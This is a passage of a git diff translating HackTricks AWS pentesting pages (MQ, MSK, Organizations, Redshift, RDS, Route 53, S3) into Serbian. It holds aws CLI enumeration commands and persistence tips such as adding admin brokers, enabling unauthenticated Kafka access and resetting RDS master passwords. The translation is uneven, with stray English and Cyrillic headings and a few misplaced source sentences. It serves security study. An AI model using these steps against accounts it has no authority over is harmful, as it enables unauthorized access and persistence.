+- Održavati postojeću **JMS** infrastrukturu i proširiti njene mogućnosti.
 
-ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements.
-
-## Enumeration
+Robusnost i fleksibilnost ActiveMQ-a čine ga pogodnim za mnoštvo zahteva za razmenu poruka.
 
+## Enumeracija
 ```bash
 # List brokers
 aws mq list-brokers
@@ -48,9 +47,8 @@ aws mq list-configurations
 # Creacte Active MQ user
 aws mq create-user --broker-id  --password  --username  --console-access
 ```
-
 > [!WARNING]
-> TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally and how to listen in all queues and send data (send PR if you know how to do this)
+> TODO: Naznačiti kako interno enumerisati RabbitMQ i ActiveMQ i kako slušati sve redove i slati podatke (pošaljite PR ako znate kako to da uradite)
 
 ## Privesc
 
@@ -58,23 +56,19 @@ aws mq create-user --broker-id  --password  --username  --c
 ../aws-privilege-escalation/aws-mq-privesc.md
 {{#endref}}
 
-## Unauthenticated Access
+## Neautentifikovani Pristup
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
 {{#endref}}
 
-## Persistence
+## Persistencija
 
-If you know the credentials to access the RabbitMQ web console, you can create a new user qith admin privileges.
+Ako znate akreditive za pristup RabbitMQ web konzoli, možete kreirati novog korisnika sa administratorskim privilegijama.
 
-## References
+## Reference
 
 - [https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html](https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html)
 - [https://activemq.apache.org/](https://activemq.apache.org/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md
index 42c7ca640..bd5cee505 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md
@@ -4,22 +4,21 @@
 
 ## Amazon MSK
 
-**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** is a service that is fully managed, facilitating the development and execution of applications processing streaming data through **Apache Kafka**. Control-plane operations, including creation, update, and deletion of **clusters**, are offered by Amazon MSK. The service permits the utilization of Apache Kafka **data-plane operations**, encompassing data production and consumption. It operates on **open-source versions of Apache Kafka**, ensuring compatibility with existing applications, tooling, and plugins from both partners and the **Apache Kafka community**, eliminating the need for alterations in the application code.
+**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** je usluga koja je potpuno upravljana, olakšavajući razvoj i izvršenje aplikacija koje obrađuju striming podatke putem **Apache Kafka**. Operacije kontrolne ravni, uključujući kreiranje, ažuriranje i brisanje **klastera**, nudi Amazon MSK. Usluga omogućava korišćenje Apache Kafka **operacija podataka**, obuhvatajući proizvodnju i potrošnju podataka. Radi na **open-source verzijama Apache Kafka**, osiguravajući kompatibilnost sa postojećim aplikacijama, alatima i dodacima kako partnera tako i **Apache Kafka zajednice**, eliminišući potrebu za izmenama u kodu aplikacije.
 
-In terms of reliability, Amazon MSK is designed to **automatically detect and recover from prevalent cluster failure scenarios**, ensuring that producer and consumer applications persist in their data writing and reading activities with minimal disruption. Moreover, it aims to optimize data replication processes by attempting to **reuse the storage of replaced brokers**, thereby minimizing the volume of data that needs to be replicated by Apache Kafka.
+U pogledu pouzdanosti, Amazon MSK je dizajniran da **automatski detektuje i oporavi se od uobičajenih scenarija kvara klastera**, osiguravajući da aplikacije proizvođača i potrošača nastave sa svojim aktivnostima pisanja i čitanja podataka uz minimalne prekide. Pored toga, ima za cilj da optimizuje procese replikacije podataka pokušavajući da **ponovno iskoristi skladište zamenjenih brokera**, čime se smanjuje količina podataka koja treba da se replikira putem Apache Kafka.
 
-### **Types**
+### **Tipovi**
 
-There are 2 types of Kafka clusters that AWS allows to create: Provisioned and Serverless.
+Postoje 2 tipa Kafka klastera koje AWS omogućava da se kreiraju: Provisioned i Serverless.
 
-From the point of view of an attacker you need to know that:
+Sa stanovišta napadača, potrebno je znati da:
 
-- **Serverless cannot be directly public** (it can only run in a VPN without any publicly exposed IP). However, **Provisioned** can be configured to get a **public IP** (by default it doesn't) and configure the **security group** to **expose** the relevant ports.
-- **Serverless** **only support IAM** as authentication method. **Provisioned** support SASL/SCRAM (**password**) authentication, **IAM** authentication, AWS **Certificate** Manager (ACM) authentication and **Unauthenticated** access.
-  - Note that it's not possible to expose publicly a Provisioned Kafka if unauthenticated access is enabled
+- **Serverless ne može biti direktno javan** (može se pokretati samo u VPN-u bez javno izloženog IP-a). Međutim, **Provisioned** može biti konfiguran da dobije **javnu IP adresu** (po defaultu to ne radi) i konfiguriše **grupu bezbednosti** da **izloži** relevantne portove.
+- **Serverless** **samo podržava IAM** kao metodu autentifikacije. **Provisioned** podržava SASL/SCRAM (**lozinka**) autentifikaciju, **IAM** autentifikaciju, AWS **Certificate** Manager (ACM) autentifikaciju i **neautentifikovani** pristup.
+- Imajte na umu da nije moguće javno izložiti Provisioned Kafka ako je omogućен neautentifikovani pristup.
 
 ### Enumeration
-
 ```bash
 #Get clusters
 aws kafka list-clusters
@@ -43,9 +42,7 @@ aws kafka describe-configuration-revision --arn  --revision 
 ```
-
-### Kafka IAM Access (in serverless)
-
+### Kafka IAM Pristup (u serverless)
 ```bash
 # Guide from https://docs.aws.amazon.com/msk/latest/developerguide/create-serverless-cluster.html
 # Download Kafka
@@ -75,7 +72,6 @@ kafka_2.12-2.8.1/bin/kafka-console-producer.sh --broker-list $BS --producer.conf
 # Read messages
 kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer.config client.properties --topic msk-serverless-tutorial --from-beginning
 ```
-
 ### Privesc
 
 {{#ref}}
@@ -90,14 +86,10 @@ kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer
 
 ### Persistence
 
-If you are going to **have access to the VPC** where a Provisioned Kafka is, you could **enable unauthorised access**, if **SASL/SCRAM authentication**, **read** the password from the secret, give some **other controlled user IAM permissions** (if IAM or serverless used) or persist with **certificates**.
+Ako ćete **imati pristup VPC-u** gde se nalazi Provisioned Kafka, mogli biste **omogućiti neovlašćen pristup**, ako **SASL/SCRAM autentifikacija**, **pročitate** lozinku iz tajne, dodelite neke **druge kontrolisane korisničke IAM dozvole** (ako se koristi IAM ili serverless) ili persistirate sa **sertifikatima**.
 
 ## References
 
 - [https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html](https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md
index df5a51a37..d5b71dc46 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md
@@ -2,23 +2,22 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Baisc Information
+## Osnovne Informacije
 
-AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization.
+AWS Organizations olakšava kreiranje novih AWS naloga bez dodatnih troškova. Resursi se mogu dodeliti bez napora, nalozi se mogu efikasno grupisati, a politike upravljanja mogu se primeniti na pojedinačne naloge ili grupe, čime se poboljšava upravljanje i kontrola unutar organizacije.
 
-Key Points:
+Ključne tačke:
 
-- **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges.
-- **Resource Allocation**: It simplifies the process of allocating resources across the accounts.
-- **Account Grouping**: Accounts can be grouped together, making management more streamlined.
-- **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization.
+- **Kreiranje Novog Naloga**: AWS Organizations omogućava kreiranje novih AWS naloga bez dodatnih troškova.
+- **Dodeljivanje Resursa**: Pojednostavljuje proces dodeljivanja resursa između naloga.
+- **Grupisanje Naloga**: Nalozi se mogu grupisati, što olakšava upravljanje.
+- **Politike Upravljanja**: Politike se mogu primeniti na naloge ili grupe naloga, osiguravajući usklađenost i upravljanje unutar organizacije.
 
-You can find more information in:
+Možete pronaći više informacija u:
 
 {{#ref}}
 ../aws-basic-information/
 {{#endref}}
-
 ```bash
 # Get Org
 aws organizations describe-organization
@@ -39,13 +38,8 @@ aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y
 ## You need the permission iam:GetAccountSummary
 aws iam get-account-summary
 ```
-
-## References
+## Референце
 
 - https://aws.amazon.com/organizations/
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md
index d5cb84f1d..5799dfa9c 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md
@@ -1,28 +1,20 @@
-# AWS - Other Services Enum
+# AWS - Ostale Usluge Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## Directconnect
 
-Allows to **connect a corporate private network with AWS** (so you could compromise an EC2 instance and access the corporate network).
-
+Omogućava **povezivanje korporativne privatne mreže sa AWS** (tako da možete kompromitovati EC2 instancu i pristupiti korporativnoj mreži).
 ```
 aws directconnect describe-connections
 aws directconnect describe-interconnects
 aws directconnect describe-virtual-gateways
 aws directconnect describe-virtual-interfaces
 ```
-
 ## Support
 
-In AWS you can access current and previous support cases via the API
-
+U AWS-u možete pristupiti trenutnim i prethodnim slučajevima podrške putem API-ja
 ```
 aws support describe-cases --include-resolved-cases
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md
index 7ae94d5d6..017b9239d 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md
@@ -4,46 +4,45 @@
 
 ## Amazon Redshift
 
-Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business.
+Redshift je potpuno upravljana usluga koja može da se skalira do preko petabajta, koja se koristi kao **data warehouse za big data rešenja**. Koristeći Redshift klastere, možete da izvršavate analitiku nad vašim skupovima podataka koristeći brze, SQL-bazirane alate za upit i aplikacije poslovne inteligencije kako biste stekli bolje razumevanje vizije za vaše poslovanje.
 
-**Redshift offers encryption at rest using a four-tired hierarchy of encryption keys using either KMS or CloudHSM to manage the top tier of keys**. **When encryption is enabled for your cluster, it can't be disable and vice versa**. When you have an unencrypted cluster, it can't be encrypted.
+**Redshift nudi enkripciju u mirovanju koristeći hijerarhiju enkripcijskih ključeva sa četiri nivoa koristeći KMS ili CloudHSM za upravljanje najvišim nivoom ključeva**. **Kada je enkripcija omogućena za vaš klaster, ne može se onemogućiti i obrnuto**. Kada imate neenkriptovani klaster, ne može se enkriptovati.
 
-Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**.
+Enkripcija za vaš klaster može se dogoditi samo tokom njegove kreacije, a kada je enkriptovan, podaci, metapodaci i sve snimke su takođe enkriptovani. Nivoi enkripcijskih ključeva su sledeći, **prvi nivo je glavni ključ, drugi nivo je ključ enkripcije klastera, CEK, treći nivo, ključ enkripcije baze podataka, DEK, i konačno četvrti nivo, ključevi enkripcije podataka**.
 
 ### KMS
 
-During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective.
+Tokom kreacije vašeg klastera, možete ili odabrati **podrazumevani KMS ključ** za Redshift ili odabrati **svoj CMK**, što vam daje veću fleksibilnost u kontroli ključa, posebno iz audibilne perspektive.
 
-The default KMS key for Redshift is automatically created by Redshift the first time the key option is selected and used, and it is fully managed by AWS.
+Podrazumevani KMS ključ za Redshift automatski se kreira od strane Redshift-a prvi put kada se opcija ključa odabere i koristi, i potpuno ga upravlja AWS.
 
-This KMS key is then encrypted with the CMK master key, tier one. This encrypted KMS data key is then used as the cluster encryption key, the CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored separately from the cluster. Redshift then sends this encrypted CEK to the cluster over a secure channel where it is stored in memory.
+Ovaj KMS ključ se zatim enkriptuje sa CMK glavnim ključem, prvi nivo. Ovaj enkriptovani KMS ključ podataka se zatim koristi kao ključ enkripcije klastera, CEK, drugi nivo. Ovaj CEK se zatim šalje od strane KMS-a Redshift-u gde se čuva odvojeno od klastera. Redshift zatim šalje ovaj enkriptovani CEK klasteru preko sigurnog kanala gde se čuva u memoriji.
 
-Redshift then requests KMS to decrypt the CEK, tier two. This decrypted CEK is then also stored in memory. Redshift then creates a random database encryption key, the DEK, tier three, and loads that into the memory of the cluster. The decrypted CEK in memory then encrypts the DEK, which is also stored in memory.
+Redshift zatim traži od KMS-a da dekriptuje CEK, drugi nivo. Ovaj dekriptovani CEK se zatim takođe čuva u memoriji. Redshift zatim kreira nasumični ključ enkripcije baze podataka, DEK, treći nivo, i učitava ga u memoriju klastera. Dekriptovani CEK u memoriji zatim enkriptuje DEK, koji se takođe čuva u memoriji.
 
-This encrypted DEK is then sent over a secure channel and stored in Redshift separately from the cluster. Both the CEK and the DEK are now stored in memory of the cluster both in an encrypted and decrypted form. The decrypted DEK is then used to encrypt data keys, tier four, that are randomly generated by Redshift for each data block in the database.
+Ovaj enkriptovani DEK se zatim šalje preko sigurnog kanala i čuva se u Redshift-u odvojeno od klastera. I CEK i DEK su sada čuvani u memoriji klastera u enkriptovanom i dekriptovanom obliku. Dekriptovani DEK se zatim koristi za enkripciju ključeva podataka, četvrti nivo, koji se nasumično generišu od strane Redshift-a za svaki blok podataka u bazi.
 
-You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3.
+Možete koristiti AWS Trusted Advisor za praćenje konfiguracije vaših Amazon S3 kanti i osiguranje da je logovanje kanti omogućeno, što može biti korisno za izvođenje bezbednosnih audita i praćenje obrazaca korišćenja u S3.
 
 ### CloudHSM
 
 

 
-Using Redshift with CloudHSM
+Korišćenje Redshift-a sa CloudHSM
 
-When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates.
+Kada radite sa CloudHSM za izvođenje vaše enkripcije, prvo morate postaviti poverljivu vezu između vašeg HSM klijenta i Redshift-a koristeći klijentske i serverske sertifikate.
 
-This connection is required to provide secure communications, allowing encryption keys to be sent between your HSM client and your Redshift clusters. Using a randomly generated private and public key pair, Redshift creates a public client certificate, which is encrypted and stored by Redshift. This must be downloaded and registered to your HSM client, and assigned to the correct HSM partition.
+Ova veza je potrebna za obezbeđivanje sigurnih komunikacija, omogućavajući slanje enkripcijskih ključeva između vašeg HSM klijenta i vaših Redshift klastera. Koristeći nasumično generisani privatni i javni ključ, Redshift kreira javni klijentski sertifikat, koji je enkriptovan i čuvan od strane Redshift-a. Ovaj sertifikat mora biti preuzet i registrovan kod vašeg HSM klijenta, i dodeljen ispravnoj HSM particiji.
 
-You must then configure Redshift with the following details of your HSM client: the HSM IP address, the HSM partition name, the HSM partition password, and the public HSM server certificate, which is encrypted by CloudHSM using an internal master key. Once this information has been provided, Redshift will confirm and verify that it can connect and access development partition.
+Zatim morate konfigurisati Redshift sa sledećim detaljima vašeg HSM klijenta: IP adresa HSM-a, naziv HSM particije, lozinka HSM particije, i javni HSM serverski sertifikat, koji je enkriptovan od strane CloudHSM koristeći unutrašnji glavni ključ. Kada su ovi podaci dostavljeni, Redshift će potvrditi i verifikovati da može da se poveže i pristupi razvoju particije.
 
-If your internal security policies or governance controls dictate that you must apply key rotation, then this is possible with Redshift enabling you to rotate encryption keys for encrypted clusters, however, you do need to be aware that during the key rotation process, it will make a cluster unavailable for a very short period of time, and so it's best to only rotate keys as and when you need to, or if you feel they may have been compromised.
+Ako vaša interna pravila bezbednosti ili upravljačke kontrole nalažu da morate primeniti rotaciju ključeva, onda je to moguće sa Redshift-om koji vam omogućava da rotirate enkripcijske ključeve za enkriptovane klastere, međutim, morate biti svesni da će tokom procesa rotacije klaster biti nedostupan na vrlo kratak period, pa je najbolje rotirati ključeve samo kada je to potrebno, ili ako smatrate da su možda kompromitovani.
 
-During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'.
+Tokom rotacije, Redshift će rotirati CEK za vaš klaster i za sve rezervne kopije tog klastera. Rotiraće DEK za klaster, ali nije moguće rotirati DEK za snimke pohranjene u S3 koje su enkriptovane koristeći DEK. Staviće klaster u stanje 'rotacije ključeva' dok se proces ne završi kada će status ponovo biti 'dostupan'.
 
 

 
 ### Enumeration
-
 ```bash
 # Get clusters
 aws redshift describe-clusters
@@ -82,22 +81,17 @@ aws redshift describe-scheduled-actions
 # The redshift instance must be publicly available (not by default), the sg need to allow inbounds connections to the port and you need creds
 psql -h redshift-cluster-1.sdflju3jdfkfg.us-east-1.redshift.amazonaws.com -U admin -d dev -p 5439
 ```
-
 ## Privesc
 
 {{#ref}}
 ../aws-privilege-escalation/aws-redshift-privesc.md
 {{#endref}}
 
-## Persistence
+## Persistencija
 
-The following actions allow to grant access to other AWS accounts to the cluster:
+Sledeće akcije omogućavaju dodeljivanje pristupa drugim AWS nalozima klasteru:
 
 - [authorize-endpoint-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-endpoint-access.html)
 - [authorize-snapshot-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-snapshot-access.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md
index 473369403..06b6f2b1b 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md
@@ -2,76 +2,75 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-The **Relational Database Service (RDS)** offered by AWS is designed to streamline the deployment, operation, and scaling of a **relational database in the cloud**. This service offers the advantages of cost efficiency and scalability while automating labor-intensive tasks like hardware provisioning, database configuration, patching, and backups.
+**Relational Database Service (RDS)** koji nudi AWS je dizajniran da pojednostavi implementaciju, rad i skaliranje **relacione baze podataka u oblaku**. Ova usluga nudi prednosti troškovne efikasnosti i skalabilnosti dok automatski obavlja radno intenzivne zadatke poput obezbeđivanja hardvera, konfiguracije baze podataka, zakrpa i rezervnih kopija.
 
-AWS RDS supports various widely-used relational database engines including MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server, and Amazon Aurora, with compatibility for both MySQL and PostgreSQL.
+AWS RDS podržava različite široko korišćene motore relacijskih baza podataka uključujući MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server i Amazon Aurora, sa kompatibilnošću za MySQL i PostgreSQL.
 
-Key features of RDS include:
+Ključne karakteristike RDS uključuju:
 
-- **Management of database instances** is simplified.
-- Creation of **read replicas** to enhance read performance.
-- Configuration of **multi-Availability Zone (AZ) deployments** to ensure high availability and failover mechanisms.
-- **Integration** with other AWS services, such as:
-  - AWS Identity and Access Management (**IAM**) for robust access control.
-  - AWS **CloudWatch** for comprehensive monitoring and metrics.
-  - AWS Key Management Service (**KMS**) for ensuring encryption at rest.
+- **Upravljanje instancama baza podataka** je pojednostavljeno.
+- Kreiranje **read replicas** za poboljšanje performansi čitanja.
+- Konfiguracija **multi-Availability Zone (AZ) implementacija** za obezbeđivanje visoke dostupnosti i mehanizama prebacivanja.
+- **Integracija** sa drugim AWS uslugama, kao što su:
+- AWS Identity and Access Management (**IAM**) za robusnu kontrolu pristupa.
+- AWS **CloudWatch** za sveobuhvatno praćenje i metrike.
+- AWS Key Management Service (**KMS**) za obezbeđivanje enkripcije u mirovanju.
 
-## Credentials
+## Akreditivi
 
-When creating the DB cluster the master **username** can be configured (**`admin`** by default). To generate the password of this user you can:
+Kada kreirate DB klaster, glavno **korisničko ime** može biti konfigurisano (**`admin`** po defaultu). Da biste generisali lozinku za ovog korisnika možete:
 
-- **Indicate** a **password** yourself
-- Tell RDS to **auto generate** it
-- Tell RDS to manage it in **AWS Secret Manager** encrypted with a KMS key
+- **Naznačiti** lozinku sami
+- Reći RDS da je **automatski generiše**
+- Reći RDS da je upravlja u **AWS Secret Manager** enkriptovano KMS ključem
 
 

 
-### Authentication
+### Autentifikacija
 
-There are 3 types of authentication options, but using the **master password is always allowed**:
+Postoje 3 vrste opcija autentifikacije, ali korišćenje **glavne lozinke je uvek dozvoljeno**:
 
 

 
-### Public Access & VPC
+### Javni pristup i VPC
 
-By default **no public access is granted** to the databases, however it **could be granted**. Therefore, by default only machines from the same VPC will be able to access it if the selected **security group** (are stored in EC2 SG)allows it.
+Po defaultu **nema javnog pristupa** bazama podataka, međutim, **može biti dodeljen**. Stoga, po defaultu samo mašine iz iste VPC će moći da mu pristupe ako izabrana **grupa sigurnosti** (smeštena u EC2 SG) to dozvoljava.
 
-Instead of exposing a DB instance, it’s possible to create a **RDS Proxy** which **improves** the **scalability** & **availability** of the DB cluster.
+Umesto izlaganja DB instance, moguće je kreirati **RDS Proxy** koji **poboljšava** **skalabilnost** i **dostupnost** DB klastera.
 
-Moreover, the **database port can be modified** also.
+Pored toga, **port baze podataka se takođe može modifikovati**.
 
-### Encryption
+### Enkripcija
 
-**Encryption is enabled by default** using a AWS managed key (a CMK could be chosen instead).
+**Enkripcija je omogućena po defaultu** koristeći AWS upravljani ključ (može se izabrati i CMK).
 
-By enabling your encryption, you are enabling **encryption at rest for your storage, snapshots, read replicas and your back-ups**. Keys to manage this encryption can be issued by using **KMS**.\
-It's not possible to add this level of encryption after your database has been created. **It has to be done during its creation**.
+Omogućavanjem vaše enkripcije, omogućavate **enkripciju u mirovanju za vašu skladištenje, snimke, read replicas i vaše rezervne kopije**. Ključevi za upravljanje ovom enkripcijom mogu biti izdati korišćenjem **KMS**.\
+Nije moguće dodati ovaj nivo enkripcije nakon što je vaša baza podataka kreirana. **To mora biti učinjeno tokom njene kreacije**.
 
-However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted.
+Međutim, postoji **rešenje koje vam omogućava da enkriptujete neenkriptovanu bazu podataka na sledeći način**. Možete kreirati snimak vaše neenkriptovane baze podataka, kreirati enkriptovanu kopiju tog snimka, koristiti taj enkriptovani snimak za kreiranje nove baze podataka, i na kraju, vaša baza podataka bi tada bila enkriptovana.
 
-#### Transparent Data Encryption (TDE)
+#### Transparentna enkripcija podataka (TDE)
 
-Alongside the encryption capabilities inherent to RDS at the application level, RDS also supports **additional platform-level encryption mechanisms** to safeguard data at rest. This includes **Transparent Data Encryption (TDE)** for Oracle and SQL Server. However, it's crucial to note that while TDE enhances security by encrypting data at rest, it may also **affect database performance**. This performance impact is especially noticeable when used in conjunction with MySQL cryptographic functions or Microsoft Transact-SQL cryptographic functions.
+Pored mogućnosti enkripcije inherentnih RDS-u na nivou aplikacije, RDS takođe podržava **dodatne mehanizme enkripcije na platformi** za zaštitu podataka u mirovanju. Ovo uključuje **Transparentnu enkripciju podataka (TDE)** za Oracle i SQL Server. Međutim, važno je napomenuti da, iako TDE poboljšava sigurnost enkripcijom podataka u mirovanju, može takođe **uticati na performanse baze podataka**. Ovaj uticaj na performanse je posebno primetan kada se koristi u kombinaciji sa MySQL kriptografskim funkcijama ili Microsoft Transact-SQL kriptografskim funkcijama.
 
-To utilize TDE, certain preliminary steps are required:
+Da biste koristili TDE, potrebni su određeni preliminarni koraci:
 
-1. **Option Group Association**:
-   - The database must be associated with an option group. Option groups serve as containers for settings and features, facilitating database management, including security enhancements.
-   - However, it's important to note that option groups are only available for specific database engines and versions.
-2. **Inclusion of TDE in Option Group**:
-   - Once associated with an option group, the Oracle Transparent Data Encryption option needs to be included in that group.
-   - It's essential to recognize that once the TDE option is added to an option group, it becomes a permanent fixture and cannot be removed.
-3. **TDE Encryption Modes**:
-   - TDE offers two distinct encryption modes:
-     - **TDE Tablespace Encryption**: This mode encrypts entire tables, providing a broader scope of data protection.
-     - **TDE Column Encryption**: This mode focuses on encrypting specific, individual elements within the database, allowing for more granular control over what data is encrypted.
+1. **Asocijacija grupe opcija**:
+- Baza podataka mora biti povezana sa grupom opcija. Grupe opcija služe kao kontejneri za podešavanja i funkcije, olakšavajući upravljanje bazom podataka, uključujući poboljšanja sigurnosti.
+- Međutim, važno je napomenuti da su grupe opcija dostupne samo za određene motore baza podataka i verzije.
+2. **Uključivanje TDE u grupu opcija**:
+- Kada je povezana sa grupom opcija, opcija Oracle Transparent Data Encryption treba biti uključena u tu grupu.
+- Važno je prepoznati da, kada se TDE opcija doda grupi opcija, postaje trajna i ne može se ukloniti.
+3. **TDE režimi enkripcije**:
+- TDE nudi dva različita režima enkripcije:
+- **TDE Tablespace Encryption**: Ovaj režim enkriptuje cele tabele, pružajući širi opseg zaštite podataka.
+- **TDE Column Encryption**: Ovaj režim se fokusira na enkripciju specifičnih, pojedinačnih elemenata unutar baze podataka, omogućavajući detaljniju kontrolu nad tim koji su podaci enkriptovani.
 
-Understanding these prerequisites and the operational intricacies of TDE is crucial for effectively implementing and managing encryption within RDS, ensuring both data security and compliance with necessary standards.
-
-### Enumeration
+Razumevanje ovih preduslova i operativnih složenosti TDE je ključno za efikasno implementiranje i upravljanje enkripcijom unutar RDS, obezbeđujući i sigurnost podataka i usklađenost sa potrebnim standardima.
 
+### Enumeracija
 ```bash
 # Clusters info
 ## Get Endpoints, username, port, iam auth enabled, attached roles, SG
@@ -106,8 +105,7 @@ aws rds describe-db-proxy-targets
 ## reset credentials of MasterUsername
 aws rds modify-db-instance --db-instance-identifier  --master-user-password  --apply-immediately
 ```
-
-### Unauthenticated Access
+### Neautentifikovani Pristup
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md
@@ -119,28 +117,24 @@ aws rds modify-db-instance --db-instance-identifier  --master-user-password
 ../aws-privilege-escalation/aws-rds-privesc.md
 {{#endref}}
 
-### Post Exploitation
+### Post Eksploatacija
 
 {{#ref}}
 ../aws-post-exploitation/aws-rds-post-exploitation.md
 {{#endref}}
 
-### Persistence
+### Postojanost
 
 {{#ref}}
 ../aws-persistence/aws-rds-persistence.md
 {{#endref}}
 
-### SQL Injection
+### SQL Injekcija
 
-There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**.
+Postoje načini za pristup podacima iz DynamoDB koristeći **SQL sintaksu**, stoga su tipične **SQL injekcije takođe moguće**.
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/sql-injection
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md
index c37002eb7..fd97a22b8 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md
@@ -4,16 +4,15 @@
 
 ## Route 53
 
-Amazon Route 53 is a cloud **Domain Name System (DNS)** web service.\
-You can create https, http and tcp **health checks for web pages** via Route53.
+Amazon Route 53 je cloud **Domain Name System (DNS)** web servis.\
+Možete kreirati https, http i tcp **health checks za web stranice** putem Route53.
 
 ### IP-based routing 
 
-This is useful to tune your DNS routing to make the best DNS routing decisions for your end users.\
-IP-based routing offers you the additional ability to **optimize routing based on specific knowledge of your customer base**.
+Ovo je korisno za podešavanje vašeg DNS rutiranja kako biste doneli najbolje DNS rutirajuće odluke za vaše krajnje korisnike.\
+IP-based routing vam nudi dodatnu mogućnost da **optimizujete rutiranje na osnovu specifičnog znanja o vašoj bazi korisnika**.
 
 ### Enumeration
-
 ```bash
 aws route53 list-hosted-zones # Get domains
 aws route53 get-hosted-zone --id 
@@ -21,7 +20,6 @@ aws route53 list-resource-record-sets --hosted-zone-id  # Get al
 aws route53 list-health-checks
 aws route53 list-traffic-policies
 ```
-
 ### Privesc
 
 {{#ref}}
@@ -29,7 +27,3 @@ aws route53 list-traffic-policies
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md
index 3133c0eac..eec8779ef 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md
@@ -4,144 +4,137 @@
 
 ## S3
 
-Amazon S3 is a service that allows you **store big amounts of data**.
+Amazon S3 je usluga koja omogućava **čuvanje velikih količina podataka**.
 
